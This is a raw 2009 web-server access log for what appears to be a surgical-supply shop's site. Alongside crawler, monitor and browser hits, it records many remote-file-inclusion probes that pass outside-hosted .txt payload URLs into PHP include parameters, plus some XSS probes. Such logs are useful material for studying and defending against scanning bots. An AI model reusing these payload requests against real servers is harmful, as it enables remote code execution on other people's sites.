66.249.65.67 - - [26/Nov/2009:01:57:47 -0500] "GET /images/items/orthoscrew_thumb.jpg HTTP/1.1" 200 1497 "-" "Googlebot-Image/1.0"
64.191.166.24 - - [26/Nov/2009:01:58:00 -0500] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:58:08 -0500] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:58:08 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:58:08 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:01:58:29 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.22.119.110 - - [26/Nov/2009:01:59:12 -0500] "GET /logs/access_log.Q109110600//index.php?m=tasks&inactive=toggle%22%3E%3Cimg/src/onerror=alert(0)%3E HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:01:59:13 -0500] "GET //index.php?m=tasks&inactive=toggle%22%3E%3Cimg/src/onerror=alert(0)%3E HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:01:59:13 -0500] "GET /logs//index.php?m=tasks&inactive=toggle%22%3E%3Cimg/src/onerror=alert(0)%3E HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
98.198.233.247 - - [26/Nov/2009:01:59:35 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
204.202.2.23 - - [26/Nov/2009:01:59:38 -0500] "GET //modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:01:59:38 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:01:59:38 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
98.198.233.247 - - [26/Nov/2009:01:59:39 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:59:39 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:59:39 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
204.202.2.23 - - [26/Nov/2009:02:00:01 -0500] "GET /logs/access_log.Q109082000%20%20//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:02:00:07 -0500] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:02:02:28 -0500] "GET /logs///components/com_simpleboard/file_upload.php?sbp=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:02:02:28 -0500] "GET /logs/access_log.Q109070500%20%20///components/com_simpleboard/file_upload.php?sbp=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:02:02:28 -0500] "GET ///components/com_simpleboard/file_upload.php?sbp=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.22.119.110 - - [26/Nov/2009:02:02:32 -0500] "GET /logs/error_log.Q109110600//index.php?m=tasks&inactive=toggle%22%3E%3Cimg/src/onerror=alert(0)%3E HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
209.59.12.99 - - [26/Nov/2009:02:03:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.195.252.206 - - [26/Nov/2009:02:03:57 -0500] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
64.22.119.110 - - [26/Nov/2009:02:04:31 -0500] "GET /logs/access_log.Q109110600//index.php?m=tasks&inactive= HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:02:04:31 -0500] "GET //index.php?m=tasks&inactive= HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:02:04:31 -0500] "GET /logs//index.php?m=tasks&inactive= HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
70.162.167.120 - - [26/Nov/2009:02:04:32 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.427.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
70.162.167.120 - - [26/Nov/2009:02:04:32 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.427.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
70.162.167.120 - - [26/Nov/2009:02:04:39 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.427.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
70.162.167.120 - - [26/Nov/2009:02:04:39 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.427.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
203.130.149.241 - - [26/Nov/2009:02:07:19 -0500] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:07:19 -0500] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:07:20 -0500] "GET /logs/access_log.Q109081500%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:08:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.107.130 - - [26/Nov/2009:02:09:07 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:09:07 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:09:07 -0500] "GET /logs/access_log.Q109091100%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:02:09:29 -0500] "GET /logs/access_log.Q109070500///components/com_simpleboard/file_upload.php?sbp=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:09:43 -0500] "GET /logs/access_log.Q109091100%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:09:43 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:09:48 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:02:10:57 -0500] "GET /logs/error_log.Q109081300//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:02:10:57 -0500] "GET /logs/error_log.Q109101300//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:02:11:11 -0500] "GET /logs/error_log.Q109062800 HTTP/1.0" 200 2414730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Nov/2009:02:13:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.191.166.24 - - [26/Nov/2009:02:14:09 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:02:14:10 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:02:14:42 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:02:14:43 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.201.180.130 - - [26/Nov/2009:02:15:25 -0500] "GET /logs/access_log.Q109091100//include/bbs.lib.inc.php?site_path=http://markandrews.net//plugins/system/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
200.201.180.130 - - [26/Nov/2009:02:15:25 -0500] "GET //include/bbs.lib.inc.php?site_path=http://markandrews.net//plugins/system/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
200.201.180.130 - - [26/Nov/2009:02:15:25 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://markandrews.net//plugins/system/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
89.108.91.144 - - [26/Nov/2009:02:15:46 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:02:15:46 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:02:16:04 -0500] "GET /logs/error_log.Q109052200//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:02:16:04 -0500] "GET //modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:02:16:04 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:02:17:42 -0500] "GET /logs/access_log.Q109051500%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:18:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.71.237.150 - - [26/Nov/2009:02:22:57 -0500] "GET ///modules/4nAlbum/public/displayCategory.php?basepath=http://bagoes.fileave.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.71.237.150 - - [26/Nov/2009:02:22:57 -0500] "GET /logs///modules/4nAlbum/public/displayCategory.php?basepath=http://bagoes.fileave.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.71.237.150 - - [26/Nov/2009:02:22:57 -0500] "GET /logs/error_log.Q109101300///modules/4nAlbum/public/displayCategory.php?basepath=http://bagoes.fileave.com/id1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:22:59 -0500] "GET /logs/access_log.Q109092200////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.201.180.130 - - [26/Nov/2009:02:23:16 -0500] "GET /logs/access_log.Q109091100////skin/ggambo7002_board/comment_modify.php?dir=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
200.201.180.130 - - [26/Nov/2009:02:23:16 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
200.201.180.130 - - [26/Nov/2009:02:23:16 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
220.181.7.77 - - [26/Nov/2009:02:23:17 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [26/Nov/2009:02:23:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.94 - - [26/Nov/2009:02:24:36 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.195.252.206 - - [26/Nov/2009:02:25:40 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:02:25:40 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:02:26:08 -0500] "GET /logs/access_log.Q109060500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:17 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:17 -0500] "GET /logs/access_log.Q109052400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:17 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:31 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:31 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:43 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:26:43 -0500] "GET /logs/access_log.Q109050800%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:27:10 -0500] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:02:27:10 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:02:27:11 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:27:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:27:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:02:27:21 -0500] "GET /logs/access_log.Q109060500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:02:27:23 -0500] "GET /images/items/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Googlebot-Image/1.0"
200.71.237.150 - - [26/Nov/2009:02:27:30 -0500] "GET /logs/access_log.Q109100200///modules/4nAlbum/public/displayCategory.php?basepath=http://bagoes.fileave.com/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:27:41 -0500] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:28:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.91.144 - - [26/Nov/2009:02:29:01 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:02:29:01 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:02:29:06 -0500] "GET /logs/access_log.Q109060500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:29:44 -0500] "GET /logs/access_log.Q109072500////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
75.125.107.130 - - [26/Nov/2009:02:30:14 -0500] "GET /logs/access_log.Q109091100////skin/ggambo7002_board/comment_modify.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:32:11 -0500] "GET /logs/access_log.Q109052400//ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:32:11 -0500] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:32:11 -0500] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:02:32:54 -0500] "GET /logs/access_log.Q109060500//ncaster/admin/addons/archive/archive.php?adminfolder=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:33:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.33.230 - - [26/Nov/2009:02:34:11 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:34:11 -0500] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:34:11 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:35:26 -0500] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:35:44 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:35:44 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:35:44 -0500] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:36:31 -0500] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.30.149.221 - - [26/Nov/2009:02:36:59 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:36:59 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
190.95.231.98 - - [26/Nov/2009:02:37:26 -0500] "GET /logs/index.php?pag=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:02:37:26 -0500] "GET /index.php?pag=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:02:37:26 -0500] "GET /logs/access_log.Q109091100/index.php?pag=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:37:29 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:37:55 -0500] "GET /logs/access_log.Q109051200%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76938 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:13 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
